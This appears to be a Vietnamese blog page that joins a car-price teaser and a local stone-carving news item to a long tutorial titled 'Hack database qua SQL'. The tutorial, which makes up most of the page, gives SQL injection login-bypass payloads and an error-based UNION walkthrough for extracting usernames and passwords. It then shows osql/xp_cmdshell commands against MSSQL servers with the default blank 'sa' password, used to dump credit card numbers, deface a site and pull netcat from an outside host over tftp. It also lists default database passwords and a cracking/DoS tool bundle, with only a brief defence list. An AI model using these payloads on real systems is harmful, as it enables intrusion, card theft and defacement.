Xe Hyundai Sonata Eco 2015 sẽ chính thức có mặt trên thị trường Mỹ trong vài tuần tới đây với giá 23.275 USD. Nếu thêm tùy chọn gói Technology Package, người mua sẽ phải trả thêm 4.100 USD.

Xin Mời Đọc Tiếp ...

Hack database qua SQL

Hầu hết các chương trình ứng dụng web mới đều dựa trên cấu trúc dữ liệu động để để đạt được tính hấp dẫn của các chương trình desktop cổ điển. Cơ chế động này đạt được bằng cách thu thập dữ liệu từ 1 database. Một trong những nền database phổ biến hơn cả trong các ứng dụng e-shop là SQL. Rất nhiều các ứng dụng web chỉ dựa hoàn toàn vào những scripts ở đầu vào ( phía người dùng - client ), những đoạn scripts này chỉ đơn giản là truy vấn 1 SQL database nằm ở ngay trên webserver hay nằm trên 1 hệ thống đầu cuối ( phía server ) riêng biệt. Một trong những cách tấn công khó bị nhận thấy và nguy hiểm nhất lên 1 ứng dụng web bao gồm việc chiếm đoạt những chuỗi truy vấn được dùng bởi các scripts, để đoạt quyền điểu khiển ứng dụng đó hoặc các dữ liệu của nó. Một trong những cơ chế hiệu quả nhất để đạt được điều đó là một kỹ thuật gọi là SQL injection ( kỹ thuật chèn những câu lệnh SQL )
Cơ sở dữ liệu là trái tim của một website thương mại. Một cuộc tấn công vào server lưu giữ CSDL có thể gây ra thất thoát lớn về tài chính cho công ty. Thông thường CSDL bị hack để lấy các thông tin về thẻ tín dụng. Chỉ cần một cuộc tấn công sẽ làm giảm uy tín và lượng khách hàng bởi vì họ muốn thông tin về CC của mình được an toàn. Hầu hết các website thương mại dùng Microsoft SQL (MSSql) và Oracle. MSSQL vẫn đang chiếm ưu thế trên thị trường vì giá thành rẻ. Trong khi Oracle server được bán mắc hơn. Oracle đã từng tuyên bố là "không thể xâm nhập được", nhưng những hacker coi đó như là 1 lời thách thức và đã tìm ra rất nhiều lỗi trong Oracle server..
Bài viết được chia làm 2 phần
1. Dùng HTTP cổng 80
2. Dùng MS SQL cổng 1434
Phần 1 - Dùng cổng 80 HTTP
----------------------------------------------------------------
Kiến thức trong phần này hữu ích không chỉ đối với các hacker mà còn với những người thiết kế web. Chỉ cần một lỗi thông thường tạo ra bởi người thiết kế web có thể làm lộ thông tin về CSDL của server cho hacker. Toàn bộ mục đích của trò chơi là các chuỗi truy vấn. Người đọc coi như có kiến thức về các truy vấn và ngôn ngữ asp ( active server pages ). Thêm nữa là cách tấn công này thường chỉ cần dùng bằng 1 trình duyệt internet. Vì vậy bạn không cần bất cứ một tool nào ngoại trừ IE hay Netscape.
Thông thường, để làm 1 trang đăng nhập, người thiết kế web sẽ viết 1 đoạn mã như sau:
login.htm
<html>
<body>
<form method=get action="logincheck.asp">
<input type="text" name="login_name">
<input type="text" name="pass">
<input type="submit" value="sign in">
</form>
</body>
</html>
File logincheck.asp nằm trên server dùng để kiểm tra thông tin do user nhập vào có nội dung:
logincheck.asp
<@language="vbscript">
<%
dim conn,rs,log,pwd
log=Request.form("login_name")
pwd=Request.form("pass")
set conn = Server.CreateObject("ADODB.Connection")
conn.ConnectionString="provider=microsoft.jet.OLED B.4.0;data source=c:\folder\multiplex.mdb"
conn.Open
set rs = Server.CreateObject("ADODB.Recordset")
rs.open "Select * from table1 where login='"&log& "' and password='" &pwd& "' ",conn
If rs.EOF
response.write("Login failed")
else
response.write("Login successful")
End if
%>
Thoạt tiên đoạn code trên có vẻ ổn. 1 người dùng type username và pass trong trang login.htm và click 'Submit'. Giá trị được type vào sẽ được browser chuyển về cho logincheck.asp kiểm tra bằng cách dùng câu truy vấn "Select * from table1 where login='"&log& "' and password='" &pwd& "' ".
Mọi thứ có vẻ OK ? Chuỗi truy vấn cũng OK. Nhưng nếu 1 trang login được làm như thế thì 1 hacker sẽ có thể dễ dàng đăng nhập mà không cần một password hợp lệ nào đó. Nhìn lại chuỗi truy vấn:
"Select * from table1 where login='"&log& "' and password='" &pwd& "' "
Nếu 1 user type tên đăng nhập là "hack" và mật khẩu là "passne" thì những giá trị này sẽ được chuyển cho trang asp với method "POST" và câu truy vấn trên trở thành:
"Select * from table1 where login=' hack' and password=' passne ' "
Tốt. Nếu như có 1 dòng chứ login name "hack" và password "passne" trong CSDL thì chúng ta sẽ nhận được thông báo đăng nhập thành công. Nhưng nếu như type loginname là "hack" và password là hi' or 'a'='a' trong phần password ? Câu truy vấn sẽ trở thành:
"Select * from table1 where login=' hack' and password=' hi' or 'a'='a ' "
Click 'Submit' và Bingo, đăng nhập thành công. Chuỗi truy cập được thoả mãn khi điều kiện là password bằng 'hi' HOẶC 'a'='a'. Điều này luôn đúng và hacker sẽ đăng nhập với nick 'hack'. Có thể thử các chuỗi sau đây trong ô password nếu cách trên không làm được với một số website:
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
Dấu -- được thêm vào làm cho phần còn lại của chuỗi truy vấn trở thành 'chú thích' nên các điều kiện khác sẽ không bị kiểm tra. Tương tự có thể dùng:
hack' --
hack" --
hoặc những username khác và chọn lựa password bất kỳ để có thể đăng nhập được. Bởi vì trong câu truy vấn chỉ có phần username được kiểm tra là 'hack' và phần còn lại bị bỏ đi do có dấu -- . Nếu may mắn gặp được vào những website mà người thiết kế web đã mắc những lỗi trên, và bạn có thể login với bất kỳ username nào.
Cách tấn công cao cấp hơn: dùng các thông báo lỗi của ODBC
--------------------------------------------------------------
Theo trên ta có thể thấy cách login mà không cần phải biết bất cứ 1 password nào. Dưới đây là cách để đọc toàn bộ CSDL chỉ bằng cách dùng các truy vấn trong URL. Cách này chỉ thực hiện được đối với IIS servers, nghĩa là với các trang asp. Và IIS được sử dụng trong gần 35% các ứng dụng thương mại web. Vì vậy chắc chắn bạn sẽ tìm ra 1 nạn nhân sau khi chỉ search một vài website. Thí dụ như:
http://www.nosecurity.com/mypage.asp?id=45
trong URL, dấu '?' cho thấy đằng sau nó, giá trị 45 sẽ được chuyển cho 1 thông số ẩn. Chúng ta hãy xem lại ví dụ trên, trang login.htm có 2 form input dạng text tên là 'login_name' và 'pass', và các giá trị của 2 form này sẽ được chuyển cho logincheck.asp
Việc đăng nhập thành công cũng có thể thực hiện bằng cách mở trực tiếp trang logincheck.asp bằng cách dùng link:http://www.nosecurity.com/loginchec...ack&pass=passne nếu method là GET thay vì POST ( save html lại và sửa POST bằng GET )
Lưu ý: sự khác nhau giữa GET và POST là POST sẽ không hiện ra các giá trị được chuyển sang trang sau trên URL trong khi GET làm hiện lên các giá trị này. Để biết thêm về GET và POST nên đọc thêm RFC 1945 và 2616 trong giao thức HTTP
Sau dấu '?' thì các biến được dùng trong trang logincheck.asp sẽ được gán bằng giá trị hacker type vào. Trong URL trên thì login_name sẽ được gán với giá trị hack. Các giá trị khác nhau được ngăn cách bởi dấu '&'
Quay trở lại trang index.htm, biến id có thuộc tính ẩn và tuỳ theo những link người dùng click, giá trị của id sẽ thay đổi. Giá trị này sẽ được chuyển vào trong câu truy vấn mypage.asp và user sẽ được trả về trang mình muốn. Ứng với giá trị của 'id' là 46 sẽ có một trang khác.
Chúng ta bắt đầu hack: type thêm vào trên URL câu truy vấn sau: http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
information_schema.tables là một table hệ thống chứa thông tin về tất cả table của server. Trong đó có một field table_name chứa tất cả tên của các table. Chuỗi query SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES trả về giá trị là tên của table đầu tiên với kiểu string (nvarchar) trong INFORMATION_SCHEMA.TABLES, và chúng ta lại gộp nó 45 là một giá trị số. Vì vậy server sẽ thông báo lỗi:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'logintable' to a column of data type int. /mypage.asp, line
Trong thông báo lỗi trên ta nhận được một table là 'logintable'. Table này có thể chứa tên truy cập và password của các user. Tiếp tục type câu lệnh sau lên URL:
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'--
Tương tự table_name, column_name cũng là 1 field trong table hệ thống INFORMATION_SCHEMA.COLUMNS chứa tất cả tên các column. Và ta đang gộp tên của column đầu tiên trong table 'logintable' với giá trị 45, nên sẽ có thông báo lỗi:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int. /index.asp, line 5
Thông báo lỗi cho thấy column đầu tiên trong 'logintable' là 'login_id', để lấy tên của column thứ 2:
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int. /index.asp, line 5
Chúng ta có thêm 1 column nữa là 'login_name', tiếp tục lấy column thứ 3
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id','login_name')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'passwd' to a column of data type int. /index.asp, line 5
Đây là thông tin ta cần có: password login. Bước kế tiếp là lấy thông tin login và password từ table 'logintable', type;
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 login_name FROM logintable--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Rahul' to a column of data type int. /index.asp, line 5
Đây rồi: 1 trong những login name là 'Rahul', câu lệnh lấy password của user Rahul sẽ là: http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 password FROM logintable where login_name='Rahul'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'P455w0rd' to a column of data type int. /index.asp, line 5
OK, tên truy cập : Rahul và mật khẩu là p455w0rd. Ta đã crack được CSDL của www.nosecurity.com. Và điều này nhờ vào server đã không lọc dữ liệu truy vấn của người dùng. Lỗi SQL này vẫn còn gặp ở nhiều website, và phương pháp phòng chống tốt nhất là phân tích những request của user và lọc đi các ký tự như ', ", --, : ....
Phần 2: dùng cổng 1434 ( cổng giao tiếp SQL )
------------------------------------------------------
Chúng ta đã thấy cách làm thế nào để xâm nhập vào CSDL bằng cách dùng các malformed URL và chỉ bằng cổng 80 ( cổng http ). Sau đây ta sẽ hack database dùng port 1434. Trước khi hack chúng ta nên biết thật sự các database server là gì và hoạt động như thế nào, cùng với cách khai thác chúng.
Những người thiết kết MS SQL tạo ra một số thủ tục mặc định được lưu sẵn chung với sản phẩm của mình để giúp cho webdesigner linh động hơn. Các thủ tục này không có gì khác mà chính là các lớp hàm, được dùng để thực hiện những nhiệm vụ nào đó dựa trên các biến được truyền cho chúng. Chính những thủ tục này rất quan trọng đối với hacker, 1 số trong đó gồm:
sp_passsword -> đổi password cho 1 tên truy cập (login name) nào đó
VD: EXEC sp_password ‘oldpass’, ‘newpass’, ‘username’
sp_tables -> hiển thị tất cả table trong database hiện tại
VD: EXEC sp_tables
xp_cmdshell -> cho phép chạy câu lệnh bất kỳ lền server với quyền admin của database ( cái này quan trọng nhất, vì thông thường database được cài mặc định với quyền root )
xp_msver -> hiển thị version của SQL server và tất cả thông tin về HĐH được sử dụng.
xp_regdeletekey -> xoá một key trong registry của windows
xp_regdeletevalue -> xoá một giá trị trong registry
xp_regread -> in 1 giá trị trong registry lên màn hình
xp_regwrite -> gán 1 giá trị mới cho 1 key
xp_terminate_process -> ngừng một process nào đó
Đây là một số các lệnh quan trọng. Thật ra có hơn 50 loại thủ tục như thế. Nếu muốn database được an toàn thì điều nên làm là xoá tất cả những thủ tục đó đi bằng cách mở Master database dùng chương trình MS SQL Server Enterprise Manager. Mở folder Extended Stored Procedures và xoá các thủ tục lưu trong đó bằng cách nhấn chuột phải và chọn delete
Lưu ý:"Master" là một database quan trọng của SQLchứa tất cả thông tin về hệ thống như là login name và các thủ tục có sẵn. Nếu 1 hacker xoá master database thì SQL server sẽ bị down vĩnh viễn. Ngoài "Master" db ra còn có "Syslogins" là table hệ thống mặc định chứ tất cả username và password để login vào db ( user của db khác user của ứng dụng web ). Điều nguy hiểm nhất trong MS SQL là MS SQL mặc định có một user là "sa" với password "" ( không có pass )
Tiếp theo là cách hack db. Đầu tiên ta cần tìm ra một server bị lỗi. Download 1 chương trình scan port và scan 1 dãy ip để tìm ip có port 1433 hoặc 1434 ( tcp hay udp ) mở. Đây là port dùng bởi MS SQL server. Ngoài ra port của Oracle server là 1512. VD như chúng ta tìm được một server có ip là 198.188.178.1, có rất nhiều cách để dùng các dịch vụ của SQL như là dùng telnet hoặc netcat tới port 1433/1434. Ngoài ra có thể dùng một tool tên là osql.exe được kèm theo với các SQL server 2000. Mở DOS prompt và type vào: 

Cosql.exe -?
osql: unknown option ?
usage: osql [-U login id] [-P password]
[-S server] [-H hostname] [-E trusted connection]
[-d use database name] [-l login timeout] [-t query timeout]
[-h headers] [-s colseparator] [-w columnwidth]
[-a packetsize] [-e echo input] [-I Enable Quoted Identifiers]
[-L list servers] [-c cmdend]
[-q "cmdline query"] [-Q "cmdline query" and exit]
[-n remove numbering] [-m errorlevel]
[-r msgs to stderr] [-V severitylevel]
[-i inputfile] [-o outputfile]
[-p print statistics] [-b On error batch abort]
[-O use Old ISQL behavior disables the following]
<EOF> batch processing
Auto console width scaling
Wide messages
default errorlevel is -1 vs 1
[-? show syntax summary]
Đây là help file cho osql. Tiếp tục:
C:\> osql.exe –S 198.188.178.1 –U sa –P “”
Nếu chung ta nhận được dấu nhắc
1>
có nghĩa là login thành công, nếu không sẽ có thông báo lỗi login sai đối với user "sa"
Tới đây nếu ta muốn chạy bất kỳ câu lệnh nào đó lên server, chỉ cần dùng thủ tục "xp_cmdshell" như sau:
C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘dir >dir.txt’”
Tôi khuyến khích việc dùng -Q thay vì -q bởi vì chúng ta sẽ exit khỏi server ngay sau khi câu lệnh được thực hiện. Tương tự ta có thể chạy bất cứ một câu lệnh nào lên server. Một hacker thông minh còn có thể install backdoor nhằm để tiếp tục access vào server sau này. Ta cũng có thể dùng “information_schema.tables” để lấy list các tables và nội dung của chúng bằng cách:
C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select * from information_schema.tables”
Kiếm thông tin login trong các table như login, accounts, users ...
C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select * from users”
và lấy thông tin về username cùng với credit card.
C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select username, creditcard, expdate from users”
Output:
Username creditcard expdate
----------- ------------ ----------
Jack 5935023473209871 2004-10-03 00:00:00.000
Jill 5839203921948323 2004-07-02 00:00:00.000
Micheal 5732009850338493 2004-08-07 00:00:00.000
Ronak 5738203981300410 2004-03-02 00:00:00.000
Có thể deface website bằng cách chạy lệnh sau ( chỉ trong trường hợp database server được install chung với webserver )
C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘echo defaced by hack> C:\inetpub\wwwroot\index.html’”
Upload file lên server dùng tftp:
C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘tftp 203.192.16.12 GET nc.exe c:\nc.exe’”
Để download một file nào đó ta có thể dùng lệnh PUT thay vì GET, bởi vì các câu lệnh này sẽ được thực hiện trên server chứ không fải ở máy chúng ta. Nếu ta dùng GET, câu lệnh sẽ thực hiện trên server và sẽ download nc.exe từ máy của chúng ta tới server.
Tools dùng hack các SQL pass có rất nhiều trên web. Ngay cả lỗi tràn bộ đệm cũng có thể được dùng để điêu khiển hoàn toàn một hệ thống với quyền admin. Bài viết này chỉ đề cập một số vấn đề tổng quát về db server.
• Remember the Sapphire worm? Which was released on 25th Jan. The worm which exploited three known vulnerabilities in the SQL servers using 1433/1434 UDP ports.
Phương pháp phòng chống
---------------------------
<*> Đổi password mặc định của user "sa"
<*> Xoá tất cả các thủ tục được mặc định lưu trữ trên server
<*> Lọc những ký tự như ',",--,: ...
<*> Update SQL với những bản mới nhất
<*> Khoá các port SQL bằng cách dùng firewall
Một số website về SQL security" http://sqlsecurity.com/ http://www.cert.com/
Any comments and good criticism is always accepted at guatehack@linuxmail.org
[End of Original Message]
1. Một số password default cho các super-user:
Oracle sys: oracle
mySQL (Windows) root:null
MS SQL Server sa:null
DB2 dlfm:ibmdb2
2. Collection các tool dùng cho SQL:
SQLTools.zip ---------> www.lebuudan.net/SQLTools.zip
Bao gồm:
SQLcracker + passlist + userlist
SQLdos.exe
SQLscanner.exe
SQLping.exe
and more.
3.OSQL.exe nằm trong bộ MSDE của microsoft, nhưng tới 64Mb lận, có ai cần thì tui upload lên. Hông thì thui, host nhỏ xíu hà.
4. ebook/text :
ebook: http://www.hackersplayground.org/books.html
text: http://www.hackersplayground.org/papers.html
SQLinjection: http://www.hackersplayground.org/papers.html

Xin Mời Đọc Tiếp ...

Ngũ hành sơn đẩy mạnh phong trào điêu khắc đá mỹ nghệ

Ngũ hành sơn Thực hiện Công văn số 9247/UBND-VX ngày 15 tháng 10 năm 2014 của UBND thành phố về việc đẩy mạnh phong trào thi đua chào mừng kỷ niệm 70 năm ngày thành lập Quân đội Nhân dân (QĐND) Việt Nam (22/12/1944 – 22/12/2014) và 25 năm Ngày hội Quốc phòng toàn dân (22/12/1989 – 22/12/2014); ngày 03 tháng 11 năm 2014, UBND quận Ngũ Hành Sơn ban hành Kế hoạch số 90/KH-UBND về việc tổ chức các phong trào thi đua chào mừng kỷ niệm 70 năm ngày thành lập Quân đội Nhân dân Việt Nam và 25 năm Ngày hội Quốc phòng toàn dân nhằm giúp cho nhân dân, cán bộ, công nhân, viên chức và lực lượng vũ trang (LLVT) trên địa bàn quận nhận thức sâu sắc về bản chất cách mạng, truyền thống vẻ vang, chiến công hiển hách của QĐND Việt Nam Anh hùng trong sự nghiệp giải phóng dân tộc, xây dựng và bảo vệ Tổ quốc; vai trò lãnh đạo của Đảng, Bác Hồ, sự chăm lo đùm bọc của toàn dân đối với quá trình xây dựng, chiến đấu và trưởng thành của QĐND Việt Nam. 

  
 

       Mẫu tượng nghệ thuật do các nghệ nhân làng đá non nước điêu khắc

   Theo đó các cơ sở đá mỹ nghệ non nước, từ nay đến ngày 22 tháng 12 năm 2014 phát động phong trào thi đua với khẩu hiệu "Ra sức thi đua lập thành tích chào mừng kỷ niệm 70 năm ngày thành lập Quân đội Nhân dân Việt Nam (22/12/1944 - 22/12/2014) và 25 năm Ngày hội Quốc phòng toàn dân (22/12/1989 - 22/12/2014)";  tăng cường công tác tuyên truyền, giáo dục về truyền thống của QĐND Việt Nam qua 70 năm xây dựng, chiến đấu và trưởng thành; ý nghĩa 25 năm Ngày hội Quốc phòng toàn dân trên các phương tiện thông tin đại chúng bằng nhiều hình thức thích hợp; tổ chức các buổi nói chuyện chuyên đề về lịch sử, truyền thống vẻ vang 70 năm xây dựng, chiến đấu và trưởng thành của QĐND, 25 năm ngày Hội Quốc phòng toàn dân; tổ chức các hoạt văn hóa, văn nghệ, thể dục, thể thao…

 

          Đá mỹ nghệ Theo Kế hoạch số 90/KH-UBND của UBND quận, công tác tổ chức thực hiện các hoạt động nói trên đã được phân công, phân nhiệm rõ ràng cho các phòng, ban, ngành chức năng, Mặt trận, hội, đoàn thể của quận, bảo đảm các kế hoạch được triển khai đạt kết quả tốt./.

( trích nguồn http://www.nguhanhson.danang.gov.vn )

Xin Mời Đọc Tiếp ...